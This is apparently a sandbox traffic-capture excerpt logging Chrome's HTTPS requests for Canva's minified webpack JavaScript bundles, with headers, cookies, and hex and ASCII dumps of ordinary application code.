                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 7b 74 79 70 65 3a 5b 32 2c 5f 5f 63 2e 62 50 61 2c 33 2c 5f 5f 63 2e 63 50 61 2c 36 2c 5f 5f 63 2e 64 50 61 5d 7d 29 2c 6e 7a 29 3b 5f 5f 63 2e 6f 7a 3d 28 29 3d 3e 28 7b 67 5a 3a 54 28 32 29 2c 4f 64 3a 45 28 31 34 2c 68 7a 29 2c 56 6c 3a 54 28 31 36 29 7d 29 3b 76 61 72 20 66 50 61 3d 4d 28 28 29 3d 3e 5b 31 2c 32 2c 33 2c 34 5d 29 3b 5f 5f 63 2e 70 7a 3d 4c 28 28 29 3d 3e 28 7b 2e 2e 2e 5f 5f 63 2e 6f 7a 28 29 2c 6d 6f 64 65 3a 44 28 22 41 3f 22 2c 34 2c 22 45 4d 41 49 4c 5f 43 4f 44 45 22 29 2c 65 6d 61 69 6c 3a 51 28 31 31 29 2c 73 74 61 74 65 3a 51 28 31 32 29 2c 54 4d 61 3a 5f 5f 63 2e 4e 61 28 31 33 2c 66 50 61 29 7d 29 29 3b 76 61 72 20 67 50 61 3d 4d 28 28 29 3d 3e 5b 31 2c 32 5d 29 3b 5f 5f 63 2e 68 50 61 3d 4c 28 28 29 3d 3e 28 7b 2e 2e 2e
                                                                                                                                                                                                                                                                    Data Ascii: ({type:[2,__c.bPa,3,__c.cPa,6,__c.dPa]}),nz);__c.oz=()=>({gZ:T(2),Od:E(14,hz),Vl:T(16)});var fPa=M(()=>[1,2,3,4]);__c.pz=L(()=>({...__c.oz(),mode:D("A?",4,"EMAIL_CODE"),email:Q(11),state:Q(12),TMa:__c.Na(13,fPa)}));var gPa=M(()=>[1,2]);__c.hPa=L(()=>({...
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC526INData Raw: 3a 72 65 74 75 72 6e 22 53 45 4e 44 5f 50 41 53 53 57 4f 52 44 5f 52 45 53 45 54 5f 43 4f 44 45 22 3b 63 61 73 65 20 31 32 3a 72 65 74 75 72 6e 22 52 45 53 45 54 5f 50 41 53 53 57 4f 52 44 22 3b 63 61 73 65 20 31 33 3a 72 65 74 75 72 6e 22 47 45 54 5f 41 55 54 48 45 4e 54 49 43 41 54 49 4f 4e 5f 4f 50 54 49 4f 4e 53 22 3b 63 61 73 65 20 31 34 3a 72 65 74 75 72 6e 22 46 49 4e 44 5f 43 48 41 52 47 45 5f 44 45 54 41 49 4c 53 22 3b 63 61 73 65 20 31 35 3a 72 65 74 75 72 6e 22 45 58 54 45 52 4e 41 4c 5f 53 48 41 52 45 22 3b 63 61 73 65 20 31 37 3a 72 65 74 75 72 6e 22 55 50 44 41 54 45 5f 55 53 45 52 22 3b 0a 63 61 73 65 20 31 36 3a 72 65 74 75 72 6e 22 4d 45 4d 42 45 52 5f 49 4e 49 54 49 41 54 45 44 5f 49 4e 56 49 54 41 54 49 4f 4e 22 3b 63 61 73 65 20 31 38
                                                                                                                                                                                                                                                                    Data Ascii: :return"SEND_PASSWORD_RESET_CODE";case 12:return"RESET_PASSWORD";case 13:return"GET_AUTHENTICATION_OPTIONS";case 14:return"FIND_CHARGE_DETAILS";case 15:return"EXTERNAL_SHARE";case 17:return"UPDATE_USER";case 16:return"MEMBER_INITIATED_INVITATION";case 18


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    47192.168.2.1249775104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/107bbcd1676c194c.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 5461
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510b39967d05-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "d258a53d8e3b3337f4ad038beb8df26a"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:12 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: OyauOCretHHn5GlRIfiOBTHs3hVuTgndWHFgziiZZaS5JnbL/PKqeY0+6wodjf7ZUXl4SfxyEFc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8QE4W10B5KR4AN
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: .xltkql28Zgojf6jkFzo7TDyKRALSsN7
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 71 32 25 32 46 57 4a 6d 53 64 7a 75 54 45 6f 25 32 46 7a 52 70 45 75 6d 74 55 74 6e 42 34 6d 30 36 76 4d 55 37 62 44 61 66 68 4a 30 42 39 25 32 42 41 47 57 7a 79 6b 57 76 73 53 64 31 41 77 4d 6a 74 4b 71 55 38 70 77 77 55 54 51 4a 5a 6e 66 7a 35 43 72 45 58 54 45 75 4a 44 33 73 73 69 59 78 56 25 32 46 55 44 70 31 52 32 25 32 42 33 5a 25 32 42 6d 69 6a 45 72 6e 36 48 5a 74 76 6d 61 51 31 74 51 65 59 52 77 65 6d 70 35 51 78 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2%2FWJmSdzuTEo%2FzRpEumtUtnB4m06vMU7bDafhJ0B9%2BAGWzykWvsSd1AwMjtKqU8pwwUTQJZnfz5CrEXTEuJD3ssiYxV%2FUDp1R2%2B3Z%2BmijErn6HZtvmaQ1tQeYRwemp5Qxs%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1193INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 34 36 34 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 39 34 31 37 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4464],{/***/ 694173:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 6e 67 28 61 29 2e 70 61 64 53 74 61 72 74 28 34 2c 22 30 22 29 7d 2d 24 7b 5f 5f 63 2e 63 42 28 62 29 7d 2d 24 7b 5f 5f 63 2e 63 42 28 63 29 7d 60 7d 3b 5f 5f 63 2e 67 42 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5f 5f 63 2e 65 42 28 61 29 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 61 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 6d 6f 6e 74 68 3a 61 2e 67 65 74 4d 6f 6e 74 68 28 29 2b 31 2c 64 61 79 3a 61 2e 67 65 74 44 61 74 65 28 29 2c 61 48 3a 61 2e 67 65 74 48 6f 75 72 73 28 29 2c 79 35 3a 61 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 7d 7d 3b 0a 68 42 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 7b 73 69 7a 65 3a 62 7d 29 3d 3e 4d 51 61 28 22 69 6d 67 22 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 61 2e 74 75 2c 63 6c 61 73 73 4e 61 6d 65
                                                                                                                                                                                                                                                                    Data Ascii: ng(a).padStart(4,"0")}-${__c.cB(b)}-${__c.cB(c)}`};__c.gB=function(a){a=__c.eB(a);return{year:a.getFullYear(),month:a.getMonth()+1,day:a.getDate(),aH:a.getHours(),y5:a.getMinutes()}};hB=function(a){return({size:b})=>MQa("img",{"aria-label":a.tu,className
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 6c 75 65 73 28 29 29 3b 5f 5f 63 2e 6e 42 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 74 68 69 73 2e 65 62 3d 61 3b 74 68 69 73 2e 6e 61 3d 62 26 26 62 2e 55 6b 28 22 63 6c 6f 73 65 64 5f 63 61 70 74 69 6f 6e 5f 61 70 69 2e 68 74 74 70 5f 63 6c 69 65 6e 74 22 29 7d 7d 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 55 56 3d 63 61 28 37 37 29 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 79 4c 3d 63 61 28 37 35 29 3b 5f 5f 63 2e 6e 42 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 4b 3d 63 61 28 37 33 29 3b 76 61 72 20 61 52 61 3d 7b 7d 3b 61 52 61 2e 24 34 61 3d 5f 5f 63 2e 6e 42 3b 5f 5f 63 2e 6f 42 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 74 68 69 73 2e 65 62 3d 61 3b 74 68 69 73 2e 57 61 3d
                                                                                                                                                                                                                                                                    Data Ascii: lues());__c.nB=class{constructor(a,b){this.eb=a;this.na=b&&b.Uk("closed_caption_api.http_client")}};__c.nB.prototype.UV=ca(77);__c.nB.prototype.yL=ca(75);__c.nB.prototype.JK=ca(73);var aRa={};aRa.$4a=__c.nB;__c.oB=class{constructor(a,b){this.eb=a;this.Wa=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 35 3b 5f 5f 63 2e 68 52 61 3d 28 66 52 61 2e 67 65 74 54 69 6d 65 28 29 2b 5f 5f 63 2e 75 42 29 2f 38 36 34 45 35 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 74 79 70 65 3a 37 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 29 3b 76 61 72 20 4f 51 61 3d 7b 62 61 73 65 55 6e 69 74 3a 22 38 70 78 22 2c 73 70 61 63 65 31 35 30 3a 22 31 32 70 78 22 2c 78 73 6d 61 6c 6c 53 69 7a 65 3a 22 31 32 70 78 22 2c 73 6d 61 6c 6c 53 69 7a 65 3a 22 31 36 70 78 22 2c 73 6d 61 6c 6c 4d 65 64 69 75 6d 53 69 7a 65 3a 22 31 38 70 78 22 2c 6d 65 64 69 75 6d 53 69 7a 65 3a 22 32 34 70 78 22 2c 6c 61 72 67 65 53 69 7a 65 3a 22 33 32 70 78 22 2c 72 6f 6f 74 3a 22 79 67 47 4b 54 51 22 2c 78 73 6d 61 6c 6c 3a 22 5f 36 31 56 52 71 51 22 2c 73 6d 61 6c 6c 3a 22 61 62 75 6c 62 67 22 2c
                                                                                                                                                                                                                                                                    Data Ascii: 5;__c.hRa=(fRa.getTime()+__c.uB)/864E5;Object.freeze({type:7,value:void 0});var OQa={baseUnit:"8px",space150:"12px",xsmallSize:"12px",smallSize:"16px",smallMediumSize:"18px",mediumSize:"24px",largeSize:"32px",root:"ygGKTQ",xsmall:"_61VRqQ",small:"abulbg",
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC161INData Raw: 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 2c 0a 0a 2f 2a 2a 2a 2f 20 32 33 36 37 32 38 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 2c 0a 0a 2f 2a 2a 2a 2f 20 36 34 38 37 38 39 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 36 39 34 31 37 33 29 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 31 30 37 62 62 63 64 31 36 37 36 63 31 39 34 63 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                    Data Ascii: __, r) => r(694173),/***/ 236728:(_, __, r) => r(694173),/***/ 648789:(_, __, r) => r(694173)}])//# sourceMappingURL=sourcemaps/107bbcd1676c194c.js.map


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    48192.168.2.1249771104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC615OUTGET /web/f2b916a20536621e.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 11142
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510b5c804268-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0a5b04b991fa42e0d9abcef0b0109428"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:24 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: LLY/BC9ZI8QeTWUmDeHzHAKxyIapYG6hjLCS9mEJg5r+27imiNQJ91DkHPqtCr9PVODFtMc7T/A=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8GFDRVYH4VJCS5
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: JjKEW_4LPG798LLZ0MyECwjiT7NRZ46D
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 61 36 6a 58 39 25 32 46 50 65 6c 6a 76 6f 44 71 62 66 67 6a 4b 55 4b 4d 49 42 42 39 49 66 66 45 55 37 43 4d 6e 46 76 56 76 42 56 35 59 61 37 77 43 75 69 4f 32 51 6b 42 4a 70 30 6f 53 46 61 4e 61 68 39 48 31 25 32 42 41 38 74 45 4f 36 47 58 25 32 46 37 72 4a 49 57 49 46 67 6a 42 73 58 64 77 74 4b 39 62 38 65 6f 6c 57 4a 73 36 4e 45 39 65 67 66 63 64 78 55 59 77 6a 79 6d 39 38 77 38 6c 4f 50 4c 62 63 73 54 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6jX9%2FPeljvoDqbfgjKUKMIBB9IffEU7CMnFvVvBV5Ya7wCuiO2QkBJp0oSFaNah9H1%2BA8tEO6GX%2F7rJIWIFgjBsXdwtK9b8eolWJs6NE9egfcdxUYwjym98w8lOPLbcsTs%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 32 36 34 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 39 31 36 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34 35 66
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6264],{/***/ 9164:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 72 72 6f 72 29 7b 76 61 72 20 66 3d 65 2e 63 61 75 73 65 3d 61 2e 74 43 2e 65 72 72 6f 72 3b 66 3d 5b 60 24 7b 66 2e 6e 61 6d 65 7d 60 2c 60 24 7b 66 2e 6d 65 73 73 61 67 65 7d 60 5d 2e 66 69 6c 74 65 72 28 67 3d 3e 21 21 67 29 2e 6a 6f 69 6e 28 22 3a 20 22 29 3b 65 2e 6d 65 73 73 61 67 65 3d 60 24 7b 65 2e 6d 65 73 73 61 67 65 7d 20 28 24 7b 66 7d 29 60 7d 63 28 65 29 7d 29 7d 29 7d 3b 0a 55 41 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 72 51 61 28 62 29 7c 7c 72 51 61 28 61 29 3f 61 3d 6e 65 77 20 71 51 61 28 61 29 3a 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 3f 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 28 6e 75 6c 6c 21 3d 3d 53 41 26 26 76 6f 69 64 20 30 21 3d 3d 53 41 3f 53
                                                                                                                                                                                                                                                                    Data Ascii: rror){var f=e.cause=a.tC.error;f=[`${f.name}`,`${f.message}`].filter(g=>!!g).join(": ");e.message=`${e.message} (${f})`}c(e)})})};UA=function(a,b){a instanceof Error?rQa(b)||rQa(a)?a=new qQa(a):(self.indexedDB?a instanceof Error?(null!==SA&&void 0!==SA?S
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 61 6c 75 65 3a 61 7d 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3f 7b 62 79 74 65 73 56 61 6c 75 65 3a 61 7d 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 7b 61 72 72 61 79 56 61 6c 75 65 3a 7b 76 61 6c 75 65 73 3a 61 2e 6d 61 70 28 56 41 29 7d 7d 3a 22 6f 62 6a 65 63 74 22 3d 3d 3d 62 26 26 6e 75 6c 6c 21 3d 61 3f 7b 6b 76 6c 69 73 74 56 61 6c 75 65 3a 7b 76 61 6c 75 65 73 3a 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 61 29 2e 6d 61 70 28 28 5b 63 2c 64 5d 29 3d 3e 28 7b 6b 65 79 3a 63 2c 76 61 6c 75 65 3a 56 41 28 64 29 7d 29 29 7d 7d 3a 7b 7d 7d 3b 42 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 6e 65 77 20 4d 61 70 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 6f 66 20 61 29 61 3d 62 2e 67 65 74
                                                                                                                                                                                                                                                                    Data Ascii: alue:a}:a instanceof Uint8Array?{bytesValue:a}:Array.isArray(a)?{arrayValue:{values:a.map(VA)}}:"object"===b&&null!=a?{kvlistValue:{values:Object.entries(a).map(([c,d])=>({key:c,value:VA(d)}))}}:{}};BQa=function(a){const b=new Map;for(const c of a)a=b.get
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 51 75 6f 74 61 20 65 78 63 65 65 64 65 64 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 54 41 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 49 6e 64 65 78 65 64 20 64 62 20 75 6e 61 76 61 69 6c 61 62 6c 65 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 53 41 2c 44 51 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 22 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 72 6f 77 73 20 65 78 63 65 65 64 65 64 20 66 6f 72 20 70 75 74 20 72 65 71 75 65 73
                                                                                                                                                                                                                                                                    Data Ascii: a=class extends Error{constructor(a){super("Quota exceeded");this.cause=a}},TA=class extends Error{constructor(a){super("Indexed db unavailable");this.cause=a}},SA,DQa=class extends Error{constructor(){super("Maximum number of rows exceeded for put reques
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1369INData Raw: 28 61 29 7d 61 73 79 6e 63 20 67 65 74 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 64 65 6c 65 74 65 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 64 65 6c 65 74 65 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 63 6c 65 61 72 28 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 63 6c 65 61 72 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 28 61 2c 62 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 41 6c 6c 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 4b 65 79 73 28 61 2c 62 29 7b 61
                                                                                                                                                                                                                                                                    Data Ascii: (a)}async get(a){a=this.store.get(a);return this.xn(a)}async delete(a){a=this.store.delete(a);return this.xn(a)}async clear(){const a=this.store.clear();return this.xn(a)}async getAll(a,b){a=this.store.getAll(a,b);return this.xn(a)}async getAllKeys(a,b){a
